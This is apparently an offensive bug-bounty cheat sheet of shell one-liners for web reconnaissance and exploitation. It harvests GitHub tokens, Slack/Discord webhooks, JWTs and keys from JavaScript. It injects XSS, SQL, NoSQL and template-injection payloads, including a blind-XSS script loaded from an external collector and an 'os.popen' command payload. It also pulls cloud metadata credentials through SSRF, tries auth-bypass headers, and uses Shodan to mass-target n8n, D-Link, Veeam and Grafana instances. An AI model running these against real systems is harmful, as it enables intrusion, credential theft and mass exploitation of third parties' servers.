cat js.txt | xargs -I@ curl -s @ | grep -oE "https://hooks\.slack\.com/services/T[a-zA-Z0-9_]+/B[a-zA-Z0-9_]+/[a-zA-Z0-9_]+" | sort -u | anew slack_webhooks.txt
cat js.txt | xargs -I@ curl -s @ | grep -oE "(ghp_[a-zA-Z0-9]{36}|gho_[a-zA-Z0-9]{36}|ghu_[a-zA-Z0-9]{36}|ghs_[a-zA-Z0-9]{36}|ghr_[a-zA-Z0-9]{36}|github_pat_[a-zA-Z0-9]{22}_[a-zA-Z0-9]{59})" | sort -u | anew github_tokens.txt
cat js.txt | xargs -I@ curl -s @ | grep -oE "-----BEGIN (RSA |EC |DSA |OPENSSH |PGP )?PRIVATE KEY( BLOCK)?-----" | sort -u | anew private_keys_found.txt
cat js.txt | xargs -I@ curl -s @ | grep -oE "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sort -u | anew emails_from_js.txt
Extract Hidden Subdomains from JS
cat js.txt | xargs -I@ curl -s @ | grep -oE "https?://[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sed 's|https\?://||' | cut -d'/' -f1 | sort -u | anew subdomains_from_js.txt
cat js.txt | xargs -I@ curl -s @ | grep -oE "(graphql|gql|query|mutation)[^\"']*" | grep -oE "/[a-zA-Z0-9/_-]*graphql[a-zA-Z0-9/_-]*" | sort -u | anew graphql_endpoints.txt
cat js.txt | xargs -I@ curl -s @ | grep -oE "eyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*" | sort -u | anew jwt_tokens.txt
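A JWT captured this way can be triaged on the spot by decoding its middle (payload) segment. A hedged helper that handles base64url characters and missing padding; it is for inspection only and does not verify the signature, and the `jwt_payload` name is made up for this sketch:

```shell
# jwt_payload TOKEN: print the decoded payload (second segment) of a JWT.
jwt_payload() {
  # take segment 2, map base64url chars back to standard base64
  seg=$(printf '%s' "$1" | cut -d. -f2 | tr '_-' '/+')
  # restore stripped '=' padding to a multiple of 4
  pad=$(( (4 - ${#seg} % 4) % 4 ))
  i=0
  while [ "$i" -lt "$pad" ]; do seg="$seg="; i=$((i + 1)); done
  printf '%s' "$seg" | base64 -d 2>/dev/null
}
```

Usage sketch: `while read tok; do jwt_payload "$tok"; echo; done < jwt_tokens.txt`.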
cat js.txt | sed 's/\.js$/.js.map/' | httpx -silent -mc 200 -ct -match-string "sourcesContent" | anew sourcemaps.txt
cat js.txt | xargs -I@ curl -s @ | grep -oE "https://discord\.com/api/webhooks/[0-9]+/[A-Za-z0-9_-]+" | sort -u | anew discord_webhooks.txt
Find Hidden Admin Routes in JS
cat js.txt | xargs -I@ curl -s @ | grep -oE "[\"\'][/][a-zA-Z0-9_/-]*(admin|dashboard|manage|config|settings|internal|private|debug|api/v[0-9])[a-zA-Z0-9_/-]*[\"\']" | tr -d "\"'" | sort -u | anew hidden_routes.txt
cat urls.txt | gf xss | uro | qsreplace '"><svg onload=confirm(1)>' | dalfox pipe --silence --skip-bav
cat urls.txt | gf xss | qsreplace '"><script src=https://xss.report/c/YOURID></script>' | httpx -silent
echo target.com | waybackurls | gf xss | uro | httpx -silent | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"
cat urls.txt | gf xss | uro | xargs -I@ curl -s "https://knoxss.me/api/v3" -d "target=@" -H "X-API-KEY: YOUR_KEY"
cat js.txt | xargs -I@ bash -c 'curl -s @ | grep -E "(document\.(location|URL|cookie|domain|referrer)|innerHTML|outerHTML|eval\(|\.write\()" && echo "--- @ ---"'
cat urls.txt | httpx -silent | nuclei -dast -t dast/vulnerabilities/xss/ -rl 50
cat urls.txt | kxss 2>/dev/null | grep -v "Not Reflected" | anew reflected_params.txt
cat urls.txt | gf xss | qsreplace "jaVasCript:/*-/*`/*\`/*'/*\"/**/(/* */oNcLiCk=alert() )//" | httpx -silent -mr "alert"
cat urls.txt | gf sqli | uro | anew sqli.txt && sqlmap -m sqli.txt --batch --random-agent --level 2 --risk 2
cat urls.txt | gf sqli | qsreplace "'" | httpx -silent -ms "error|sql|syntax|mysql|postgresql|oracle" | anew sqli_errors.txt
cat urls.txt | gf sqli | qsreplace "1' AND SLEEP(5)-- -" | httpx -silent -timeout 10 | anew time_based.txt
cat sqli.txt | xargs -I@ ghauri -u @ --batch --level 3
cat urls.txt | gf sqli | qsreplace "1 UNION SELECT NULL,NULL,NULL-- -" | httpx -silent -mc 200
cat urls.txt | gf sqli | qsreplace "1' AND '1'='1" | httpx -silent -mc 200 | anew boolean_sqli.txt
cat urls.txt | qsreplace '{"$gt":""}' | httpx -silent -mc 200 | anew nosqli.txt
cat urls.txt | qsreplace "admin'||'1'=='1" | httpx -silent | anew nosqli.txt
cat urls.txt | gf ssrf | qsreplace "https://YOURBURP.oastify.com" | httpx -silent
cat urls.txt | qsreplace "http://169.254.169.254/latest/meta-data/" | httpx -silent -match-string "ami-id"
cat urls.txt | gf ssti | qsreplace "{{7*7}}" | httpx -silent -match-string "49" | anew ssti_vuln.txt
cat urls.txt | qsreplace '${7*7}' | httpx -silent -mr "49" && cat urls.txt | qsreplace '<%= 7*7 %>' | httpx -silent -mr "49"
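When `qsreplace` isn't available, the same value-swapping can be roughly approximated with sed. A stand-in sketch (the `qsr` name is invented here) that assumes payloads without `|`, `&`, or `\`, and URLs without fragments:

```shell
# qsr PAYLOAD: replace every query-string value in stdin URLs with PAYLOAD.
# '|' is used as the sed delimiter so payloads like {{7*7}} pass through untouched.
qsr() {
  payload=$1
  sed -E "s|=[^&]*|=${payload}|g"
}
```

Usage sketch: `cat urls.txt | qsr '{{7*7}}' | httpx -silent -mr "49"`.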
cat params.txt | grep -iE "(url|uri|path|src|dest|redirect|redir|return|next|target|out|view|page|show|fetch|load)" | qsreplace "http://YOURSERVER" | httpx -silent
cat urls.txt | gf ssrf | qsreplace "http://7f000001.burpcollaborator.net" | httpx -silent
cat urls.txt | qsreplace "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}" | httpx -silent
katana -u https://target.com -d 10 -jc -kf all -aff -silent | anew crawl.txt
gospider -s https://target.com -c 20 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico)" | anew
echo https://target.com | hakrawler -d 5 -subs -u | anew hakrawler.txt
paramspider -d target.com --exclude woff,css,js,png,svg,jpg -o params.txt
waymore -i target.com -mode U -oU urls.txt
katana -u https://target.com -headless -d 5 -jc -silent | anew headless_crawl.txt
katana -u https://target.com -f qurl -silent | grep "?" | anew forms.txt
# ⚠️ Crawl multiple targets with JavaScript parsing and form extraction
cat alive.txt | katana -d 8 -jc -kf all -aff -ef woff,css,png,svg,jpg,woff2,jpeg,gif,ico -c 50 -p 20 -silent -o katana_multi.txt
# ⚠️ Full crawl with sitemap parsing and robots.txt extraction
gospider -S alive.txt -c 30 -d 5 -t 20 --sitemap --robots --js -a -w --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|svg)" -o gospider_output && cat gospider_output/* | grep -oE 'https?://[^"]+' | sort -u | anew gospider_urls.txt
# ⚠️ Triple source crawling: live + wayback + gau
echo target.com | hakrawler -d 5 -subs -u > hakrawler.txt && waybackurls target.com > wayback.txt && gau target.com > gau.txt && cat hakrawler.txt wayback.txt gau.txt | sort -u | httpx -silent | anew all_crawled.txt
# ⚠️ Headless browser crawl with form interaction and XHR capture
katana -u https://target.com -headless -d 6 -jc -aff -xhr -form -timeout 15 -silent -nc -c 20 | anew headless_interactive.txt
# ⚠️ Crawl with built-in secrets/endpoints/parameters extraction
cariddi -u https://target.com -d 5 -s -e -ext 1 -plain -t 50 -c 20 | tee cariddi_results.txt && grep -E "(api|secret|key|token|pass|auth)" cariddi_results.txt | anew secrets_found.txt
# ⚠️ Mass parallel crawling with deduplication
cat domains.txt | parallel -j 10 "katana -u https://{} -d 5 -jc -silent" | uro | anew parallel_crawl.txt
# ⚠️ Combined crawling + JS endpoint extraction pipeline
katana -u https://target.com -d 5 -jc -silent | grep "\.js$" | httpx -silent | xargs -I@ bash -c 'curl -s @ | grep -oE "(\/[a-zA-Z0-9_\-\/]+)" | sort -u' | anew js_endpoints.txt && gospider -s https://target.com -d 5 -c 10 --js -q | grep -oE 'https?://[^"]+' | anew combined_crawl.txt
# ⚠️ Crawl then auto-scan discovered endpoints for vulnerabilities
katana -u https://target.com -d 6 -jc -kf all -aff -silent | tee crawl_output.txt | grep -E "\.(php|asp|aspx|jsp|do|action)(\?|$)" | nuclei -t /root/nuclei-templates/ -severity high,critical -silent -o crawl_vulns.txt
# ⚠️ Merge historical URLs with live crawl for maximum coverage
waymore -i target.com -mode U -oU waymore_urls.txt && katana -u https://target.com -d 5 -jc -aff -silent -o katana_live.txt && cat waymore_urls.txt katana_live.txt | uro | httpx -silent -mc 200,301,302,403 | anew merged_crawl.txt
# ⚠️ Run all crawlers and extract unique parameters
(gospider -s https://target.com -d 3 -c 10 -q; hakrawler -url https://target.com -d 3; katana -u https://target.com -d 3 -jc -silent) | sort -u | unfurl -u keys | sort | uniq -c | sort -rn | head -100 | anew top_params.txt
X8 Hidden Parameters
cat urls.txt | httpx -silent | xargs -I@ x8 -u @ -w params.txt
arjun -i urls.txt -oT arjun_params.txt --stable
cat urls.txt | xargs -I@ ffuf -u "@?FUZZ=test" -w params.txt -mc 200,301,302 -ac
cat js.txt | xargs -I@ curl -s @ | grep -oE "[?&][a-zA-Z0-9_]+=" | cut -d'=' -f1 | tr -d '?&' | sort -u
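The same extraction logic, demonstrated on an inline JS sample instead of live `curl` output, so you can see exactly what the grep/tr chain yields:

```bash
# Sample JS body (stand-in for: curl -s $jsfile)
js='fetch("/api/user?id=1&token=abc"); load("/search?q=test&id=2");'

# Pull out query-parameter names, strip the ?/&/= delimiters, dedupe
params=$(printf '%s' "$js" \
  | grep -oE "[?&][a-zA-Z0-9_]+=" \
  | tr -d '?&=' \
  | sort -u)
echo "$params"
```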
cat urls.txt | qsreplace 'param=value1&param=value2' | httpx -silent -mc 200
ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302,403 -ac -c -t 100
# ⚠️ Recursive directory bruteforce with depth 3
ffuf -u https://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 3 -mc 200,301,302,403 -ac -c -t 100 -o ffuf_recursive.json -of json
# ⚠️ Deep recursive scan with auto-tune and smart filtering
feroxbuster -u https://target.com -w wordlist.txt -d 5 -L 4 --auto-tune -C 404,500 --smart -o ferox_results.txt
# ⚠️ Scan multiple targets from file with recursion
cat alive.txt | xargs -I@ feroxbuster -u @ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -d 3 -t 50 --no-state -q -o ferox_@.txt
# ⚠️ Find directories with ffuf, then deep scan each with feroxbuster
ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302 -ac -c -t 100 -o dirs.json -of json && cat dirs.json | jq -r '.results[].url' | xargs -I@ feroxbuster -u @ -w wordlist.txt -x php,asp,aspx,jsp,html,js -d 2 -t 30 -q
# ⚠️ ffuf recursive with multiple extensions + backup files
ffuf -u https://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 2 -e .php,.asp,.aspx,.jsp,.html,.js,.json,.xml,.bak,.old,.txt,.conf,.config,.zip,.tar.gz -mc 200,301,302,403,500 -ac -t 80 -rate 100 -o recursive_ext.json
# ⚠️ Parallel scan with multiple wordlists and extensions
feroxbuster -u https://target.com -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,asp,aspx,jsp,bak,old,zip -d 4 -t 100 -L 5 --parallel 10 --dont-extract-links -C 404 -o ferox_parallel.txt
# ⚠️ Stealth recursive scan with custom headers and rate limiting
feroxbuster -u https://target.com -w wordlist.txt -d 3 -t 30 -r -k --random-agent -H "X-Forwarded-For: 127.0.0.1" -H "X-Custom-IP-Authorization: 127.0.0.1" --rate-limit 50 -C 400,401,403,404,500 -q -o ferox_stealth.txt
# ⚠️ Extract links from responses and add to scan queue recursively
feroxbuster -u https://target.com -w wordlist.txt -d 5 --extract-links --collect-words --collect-backups -x php,html,js,json -t 50 -o ferox_extracted.txt
# ⚠️ Smart filtering by response size and resumable state
feroxbuster -u https://target.com -w wordlist.txt -d 4 -S 0 -W 1 --filter-status 404,500 --filter-words 20 --filter-lines 5 --resume-from ferox_state.json --state-file ferox_state.json -o ferox_filtered.txt
# ⚠️ Recursive API fuzzing with JSON content-type
feroxbuster -u https://target.com/api -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -d 3 -x json -t 50 -H "Accept: application/json" -H "Content-Type: application/json" --dont-extract-links -m GET,POST -o ferox_api.txt
cat urls.txt | httpx -silent -path /.git/config -mc 200 -ms "[core]" | anew git_exposed.txt
cat urls.txt | httpx -silent -path /.env,/config.php,/wp-config.php.bak,/.htaccess,/server-status -mc 200 | anew sensitive.txt
cat urls.txt | sed 's/$/.bak/' | httpx -silent -mc 200 && cat urls.txt | sed 's/$/.old/' | httpx -silent -mc 200
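The sed mutation above only tries `.bak`/`.old`; a short sketch that widens the suffix list before probing (the hostname is illustrative, and a real run would pipe the output into httpx):

```bash
# Generate common backup-file variants for one URL
url="https://target.example/config.php"
variants=$(for ext in .bak .old .orig .save .swp "~"; do
  echo "$url$ext"
done)
echo "$variants"
```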
cat urls.txt | httpx -silent -path /swagger.json,/openapi.json,/api-docs,/swagger-ui.html -mc 200 | anew api_docs.txt
cat urls.txt | httpx -silent -path /.svn/entries,/.bzr/README,/CVS/Root -mc 200 | anew vcs_exposed.txt
cat alive.txt | httpx -silent -path /config.json,/config.yaml,/config.yml,/settings.json,/app.config -mc 200 | anew configs.txt
cat alive.txt | httpx -silent -path /database.sql,/db.sql,/backup.sql,/dump.sql -mc 200 | anew db_files.txt
nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high,medium -c 50 -rl 150 -o nuclei_results.txt
nuclei -l alive.txt -t cves/ -severity critical,high -c 30 -o cve_results.txt
subfinder -d target.com -silent | httpx -silent | nuclei -t takeovers/ -c 50
nuclei -l alive.txt -t exposed-panels/ -c 50 | anew panels.txt
nuclei -l alive.txt -t misconfiguration/ -severity high,critical | anew misconfig.txt
nuclei -l urls.txt -dast -rl 10 -c 3 -o dast_results.txt
nuclei -l alive.txt -tags cve,rce,sqli,xss -severity critical,high -o tagged_results.txt
nuclei -l ips.txt -t network/ -c 25 -o network_vulns.txt
cat urls.txt | httpx -silent -path /graphql -mc 200 | xargs -I@ curl -s @ -H "Content-Type: application/json" -d '{"query":"{__schema{types{name}}}"}' | grep -v "error"
cat alive.txt | httpx -silent -path /api/v1,/api/v2,/api/v3,/api/swagger.json -mc 200 | anew api_endpoints.txt
cat urls.txt | httpx -silent | katana -d 3 -silent | grep -oE "eyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*" | anew jwts.txt
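Once a JWT is captured, its claims can be read without the signing key, since the payload segment is just base64url. A self-contained sketch (a sample token is built first so it runs offline; padding is restored before decoding):

```bash
# base64url encode helper (strip padding, swap alphabet)
b64url() { base64 | tr -d '=\n' | tr '/+' '_-'; }

# Build a sample JWT so the demo needs no live capture
header=$(printf '%s' '{"alg":"HS256","typ":"JWT"}' | b64url)
payload=$(printf '%s' '{"sub":"admin","iat":1700000000}' | b64url)
jwt="$header.$payload.fakesignature"

# Take the middle segment, restore base64 padding, decode the claims
seg=$(printf '%s' "$jwt" | cut -d. -f2)
case $(( ${#seg} % 4 )) in
  2) seg="$seg==" ;;
  3) seg="$seg=" ;;
esac
claims=$(printf '%s' "$seg" | tr '_-' '/+' | base64 -d)
echo "$claims"
```

Look for `alg:none`, weak `alg` choices, long-lived `exp`, and role/ID claims worth tampering with.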
cat urls.txt | httpx -silent | katana -d 3 -silent | grep -oiE "(api[_-]?key|apikey|api_secret)[=:]['\"]?[a-zA-Z0-9]{16,}['\"]?" | anew api_keys.txt
# Test endpoints without auth
cat api_endpoints.txt | httpx -silent -mc 200 -fc 401,403 | anew no_auth_endpoints.txt
for i in {1..100}; do curl -s -o /dev/null -w "%{http_code}\n" "https://target.com/api/endpoint"; done | sort | uniq -c
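Reading the loop's `sort | uniq -c` tally: a wall of 200s with no 429/503 suggests the endpoint isn't throttled. The same tally logic on sample data (the codes are fabricated, standing in for the curl loop's output):

```bash
# Simulated status codes from 5 rapid requests
codes='200
200
200
429
200'
tally=$(printf '%s\n' "$codes" | sort | uniq -c | sort -rn)
echo "$tally"

# Any 429/503 lines in the tally mean throttling kicked in
if printf '%s\n' "$tally" | grep -qE '(429|503)'; then
  echo "rate limiting observed"
else
  echo "no throttling seen in sample"
fi
```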
cat urls.txt | grep -oE "(id|user_id|account_id|uid)=[0-9]+" | sed 's/=[0-9]*/=FUZZ/' | sort -u | anew bola_candidates.txt
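From each BOLA/IDOR candidate, the actual test is diffing responses for neighboring IDs while authenticated as a single user. A sketch of the ID-mutation step (URL is illustrative; a real run feeds the output to curl with your session cookie):

```bash
# Derive neighbor ids from one URL with a numeric id parameter
url="https://app.example.com/api/order?id=1337"
id=$(printf '%s' "$url" | grep -oE 'id=[0-9]+' | cut -d= -f2)

mutated=$(for candidate in $((id - 1)) $((id + 1)); do
  printf '%s\n' "$url" | sed "s/id=$id/id=$candidate/"
done)
echo "$mutated"
```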
# ⚠️ Fuzz API endpoints with common paths and methods
ffuf -u https://target.com/api/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -mc 200,201,204,301,302,401,403,405 -ac -c -t 100 -H "Content-Type: application/json" -o api_fuzz.json -of json
# ⚠️ Discover hidden API versions
ffuf -u https://target.com/api/vFUZZ/users -w <(seq 1 20) -mc 200,201,401,403 -ac -c && ffuf -u https://target.com/FUZZ/users -w <(echo -e "api\nv1\nv2\nv3\nv4\napi/v1\napi/v2\napi/v3\napi/internal\napi/private\napi/admin\napi/dev\napi/test\napi/staging\napi/beta") -mc 200,201,401,403 -ac -c
# ⚠️ Test all HTTP methods on API endpoints
cat api_endpoints.txt | while read url; do for method in GET POST PUT DELETE PATCH OPTIONS HEAD TRACE CONNECT; do CODE=$(curl -s -o /dev/null -w "%{http_code}" -X $method "$url" -H "Content-Type: application/json"); echo "$method $url - $CODE"; done; done | grep -vE " - (404|405)$" | anew api_methods.txt
# ⚠️ Fuzz GraphQL endpoints for introspection and queries
ffuf -u https://target.com/FUZZ -w <(echo -e "graphql\ngraphiql\nplayground\nconsole\nquery\ngql\nv1/graphql\nv2/graphql\napi/graphql\napi/gql") -mc 200,400 -ac -c -H "Content-Type: application/json" -d '{"query":"{__typename}"}' -X POST -o graphql_endpoints.json
# ⚠️ Discover hidden API parameters with arjun + ffuf combo
cat api_endpoints.txt | xargs -I@ -P5 arjun -u @ -m POST -oT arjun_params.txt && cat api_endpoints.txt | xargs -I@ ffuf -u @?FUZZ=test -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -mc 200,201,400,500 -ac -c -t 50 -o param_fuzz.json
# ⚠️ Test auth bypass techniques on protected endpoints
cat api_endpoints.txt | while read url; do curl -s -o /dev/null -w "%{http_code} - $url\n" "$url" -H "X-Originating-IP: 127.0.0.1" -H "X-Forwarded-For: 127.0.0.1" -H "X-Remote-IP: 127.0.0.1" -H "X-Remote-Addr: 127.0.0.1" -H "X-Custom-IP-Authorization: 127.0.0.1"; done | grep "^200" | anew auth_bypass.txt
# ⚠️ Find and extract endpoints from OpenAPI specs
ffuf -u https://target.com/FUZZ -w <(echo -e "swagger.json\nswagger.yaml\nopenapi.json\nopenapi.yaml\napi-docs\napi-docs.json\nswagger-ui.html\nswagger/v1/swagger.json\nv1/swagger.json\nv2/swagger.json\nv3/swagger.json\napi/swagger.json\ndocs/api\napi/docs") -mc 200 -ac -c | tee swagger_found.txt | xargs -I@ curl -s @ | jq -r '.paths | keys[]' 2>/dev/null | anew swagger_paths.txt
# ⚠️ Mass API fuzzing with nuclei DAST mode
cat api_endpoints.txt | httpx -silent -mc 200,201,401,403 | nuclei -dast -t dast/vulnerabilities/ -H "Content-Type: application/json" -rl 20 -c 5 -o api_nuclei_dast.txt
# ⚠️ Test for mass assignment vulnerabilities
cat api_endpoints.txt | grep -iE "(user|account|profile|register|signup|update)" | xargs -I@ curl -s -X POST @ -H "Content-Type: application/json" -d '{"admin":true,"role":"admin","isAdmin":true,"is_admin":1,"privilege":"admin","access_level":9999}' -o /dev/null -w "%{http_code} - @\n" | grep -E "^(200|201|204)" | anew mass_assignment.txt
# ⚠️ Generate API wordlist from JS files and fuzz
cat js.txt | xargs -I@ curl -s @ | grep -oE "[\"\']/(api|v[0-9])/[a-zA-Z0-9/_-]+[\"\']" | tr -d "\"'" | sort -u > custom_api_wordlist.txt && ffuf -u https://target.com/FUZZ -w custom_api_wordlist.txt -mc 200,201,204,401,403,500 -ac -c -t 80 -H "Authorization: Bearer null" -o custom_api_fuzz.json
cat urls.txt | grep -oE "[a-zA-Z0-9.-]+\.s3\.amazonaws\.com" | anew s3_buckets.txt
cat urls.txt | grep -oE "s3://[a-zA-Z0-9.-]+" | anew s3_buckets.txt
cat s3_buckets.txt | xargs -I@ sh -c 'aws s3 ls s3://@ --no-sign-request 2>/dev/null && echo "OPEN: @"'
cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.firebaseio\.com" | xargs -I@ curl -s @/.json | grep -v "null"
cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.blob\.core\.windows\.net" | anew azure_blobs.txt
cat urls.txt | grep -oE "storage\.googleapis\.com/[a-zA-Z0-9-]+" | anew gcp_buckets.txt
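The two extraction patterns above, applied to an inline sample list (stand-in for `urls.txt`) so the capture behavior is visible:

```bash
# Sample URL list: one S3 asset, one GCS object, one ordinary CDN URL
urls='https://assets.example.s3.amazonaws.com/logo.png
https://storage.googleapis.com/example-backups/dump.sql
https://cdn.example.com/app.js'

s3=$(printf '%s\n' "$urls" | grep -oE '[a-zA-Z0-9.-]+\.s3\.amazonaws\.com')
gcp=$(printf '%s\n' "$urls" | grep -oE 'storage\.googleapis\.com/[a-zA-Z0-9-]+')
echo "$s3"
echo "$gcp"
```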
cat urls.txt | gf ssrf | qsreplace "http://169.254.169.254/latest/meta-data/iam/security-credentials/" | httpx -silent -ms "AccessKeyId"
cat alive.txt | httpx -silent -path /.aws/credentials,/.docker/config.json,/kubeconfig -mc 200 | anew cloud_creds.txt
#!/bin/bash
domain=$1
mkdir -p $domain && cd $domain
# Subdomains
subfinder -d $domain -all -silent | anew subs.txt
amass enum -passive -d $domain | anew subs.txt
assetfinder -subs-only $domain | anew subs.txt
# Alive check
cat subs.txt | httpx -silent -threads 100 | anew alive.txt
# URLs
cat alive.txt | katana -d 5 -jc -silent | anew urls.txt
cat alive.txt | waybackurls | anew urls.txt
cat alive.txt | gau --threads 50 | anew urls.txt
# Vulnerability patterns
cat urls.txt | gf xss | anew xss.txt
cat urls.txt | gf sqli | anew sqli.txt
cat urls.txt | gf ssrf | anew ssrf.txt
cat urls.txt | gf lfi | anew lfi.txt
# Nuclei scan
nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high -o vulns.txt
#!/bin/bash
target=$1
echo $target | waybackurls | anew urls.txt
echo $target | gau | anew urls.txt
cat urls.txt | gf xss | uro | qsreplace '"><img src=x onerror=alert(1)>' | airixss -payload "alert(1)" | tee xss_found.txt
cat urls.txt | gf xss | uro | dalfox pipe --silence | tee -a xss_found.txt
#!/bin/bash
target=$1
mkdir -p $target/api && cd $target/api
# Find API endpoints
cat ../alive.txt | httpx -silent -path /api,/api/v1,/api/v2,/swagger.json,/openapi.json | anew api_endpoints.txt
# Extract from JS
cat ../js.txt | xargs -I@ curl -s @ | grep -oE "(/api/[^\"'\`\s<>]+)" | sort -u | anew js_api_endpoints.txt
# Test GraphQL
cat ../alive.txt | httpx -silent -path /graphql,/graphiql,/playground -mc 200 | anew graphql.txt
echo "[+] API recon complete!"
Add to your .bashrc or .zshrc:
# Quick recon
recon() {
  subfinder -d $1 -silent | anew subs.txt
  assetfinder -subs-only $1 | anew subs.txt
  cat subs.txt | httpx -silent | anew alive.txt
  echo "[+] Found $(wc -l < alive.txt) alive hosts"
}
# XSS scan
xscan() {
  echo $1 | waybackurls | gf xss | uro | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"
}
# SQLi scan
sqscan() {
  echo $1 | waybackurls | gf sqli | uro | qsreplace "'" | httpx -silent -ms "error|syntax|mysql"
}
# JS recon
jsrecon() {
  echo $1 | waybackurls | grep -iE "\.js$" | httpx -silent | nuclei -t exposures/
}
# Nuclei quick
nuke() {
  echo $1 | httpx -silent | nuclei -t /nuclei-templates/ -severity critical,high
}
# Full pipeline
fullrecon() {
  recon $1
  cat alive.txt | katana -d 3 -jc -silent | anew urls.txt
  cat urls.txt | gf xss | anew xss.txt
  cat urls.txt | gf sqli | anew sqli.txt
  nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high -o vulns.txt
}
# Certificate search
cert() {
  curl -s "https://crt.sh/?q=%25.$1&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
}
# Parameter extraction
params() {
  echo $1 | waybackurls | grep "=" | uro | unfurl keys | sort -u
}
# Subdomain takeover check
takeover() {
  subfinder -d $1 -silent | httpx -silent | nuclei -t takeovers/ -c 50
}
# Port scan
portscan() {
  naabu -host $1 -top-ports 1000 -silent | httpx -silent | anew ${1}_ports.txt
}
# Screenshot all
screenshot() {
  cat $1 | xargs -I@ gowitness single @ -o screenshots/
}
🚨 Critical Unauthenticated RCE in n8n Workflow Automation - 100,000+ servers affected! Added to CISA KEV 🚨
shodan search "n8n" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew n8n_targets.txt
cat alive.txt | httpx -silent -match-string "n8n" -match-string "workflow" -title | grep -i "n8n" | anew n8n_instances.txt
cat n8n_targets.txt | xargs -I@ -P20 sh -c 'curl -s -o /dev/null -w "%{http_code}" -X POST @/webhook-test/test -H "Content-Type: multipart/form-data" 2>/dev/null | grep -qE "^(200|400|500)$" && echo "POTENTIAL: @"' | tee n8n_webhook_check.txt
curl -s -X POST "https://target.com/webhook/ID" -H "Content-Type: application/json" --data '{"test":1}' -w "\n%{http_code}" | tail -1 | grep -qE "^(200|400)$" && echo "Webhook accepts requests"
cat n8n_targets.txt | httpx -silent -path /rest/settings -match-regex '"versionCli":"[0-9]+\.[0-9]+\.[0-9]+"' | anew n8n_versions.txt
nuclei -l n8n_targets.txt -t http/cves/2026/CVE-2026-21858.yaml -c 30 -o ni8mare_vuln.txt
⚠️ Affected: n8n < 1.121.0 | ✅ Fix: Update to n8n 1.121.0+
🚨 Authenticated RCE via Git Node in n8n - Cloud & Self-hosted affected! 🚨
cat n8n_targets.txt | httpx -silent -path /rest/node-types -match-string "git" | anew n8n_git_enabled.txt
cat n8n_targets.txt | httpx -silent -path /rest/login -mc 200,401 -title | anew n8n_auth_endpoints.txt
⚠️ Affected: n8n < 1.121.3 | ✅ Fix: Update to n8n 1.121.3+
🚨 Command Injection in Legacy D-Link DSL Routers - Under active exploitation! 🚨
shodan search "D-Link DSL" --fields ip_str,port | awk '{print $1":"$2}' | httpx -silent | anew dlink_dsl_targets.txt
cat dlink_dsl_targets.txt | httpx -silent -path /dnscfg.cgi -mc 200,401 | anew dlink_dnscfg.txt
cat alive.txt | httpx -silent -match-string "D-Link" -match-string "DSL" -title -tech-detect | anew dlink_routers.txt
⚠️ Affected: Legacy D-Link DSL Gateway Routers (EOL) | ✅ Fix: Replace with supported devices
🚨 RCE via Postgres Parameter Injection in Veeam Backup & Replication 🚨
shodan search "Veeam" --fields ip_str,port | awk '{print "https://"$1":"$2}' | httpx -silent | anew veeam_targets.txt
cat alive.txt | httpx -silent -match-string "Veeam" -title -tech-detect | grep -i "veeam" | anew veeam_instances.txt
⚠️ Affected: Veeam B&R 13.0.1.180 and earlier | ✅ Fix: Update to 13.0.1.1071+
🚨 Zero-Day XSS in Grafana - 46,500+ instances still vulnerable! Account Takeover possible 🚨
shodan search "Grafana" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew grafana_targets.txt
cat grafana_targets.txt | httpx -silent -path /api/frontend/settings -match-regex '"version":"[0-9]+\.[0-9]+\.[0-9]+"' | anew grafana_versions.txt
cat grafana_targets.txt | xargs -I@ sh -c 'curl -sI "@/login?redirect=//" 2>/dev/null | grep -i "location" && echo "CHECK: @"' | tee grafana_redirect_check.txt
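The redirect check above boils down to classifying the `Location` header. A sketch of that classification (the header block is sample data standing in for `curl -sI` output; the heuristic is coarse, since same-site absolute URLs also match `https://*`):

```bash
# Sample response headers for a /login?redirect=//evil.example request
headers='HTTP/1.1 302 Found
Location: //evil.example/phish
Content-Length: 0'

loc=$(printf '%s\n' "$headers" | grep -i '^location:' | awk '{print $2}' | tr -d '\r')
case "$loc" in
  //*|http://*|https://*) verdict="external redirect candidate: $loc" ;;
  *)                      verdict="relative redirect (likely safe)" ;;
esac
echo "$verdict"
```

Protocol-relative `//host` redirects are the classic open-redirect shape, since browsers resolve them to the attacker's host.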
cat alive.txt | httpx -silent -path /login -match-string "Grafana" -title | anew grafana_logins.txt
⚠️ Affected: Multiple Grafana versions | ✅ Fix: Update to latest patched version
🚨 10 Oneliners to hunt CVE-2026 vulnerabilities across subdomains at scale! 🚨
subfinder -d target.com -silent | httpx -silent -title -tech-detect | tee alive_subs.txt | while read line; do echo "$line" | grep -qiE "(n8n|grafana|d-link)" && echo "[CVE-2026 TARGET] $line"; done | anew cve2026_targets.txt
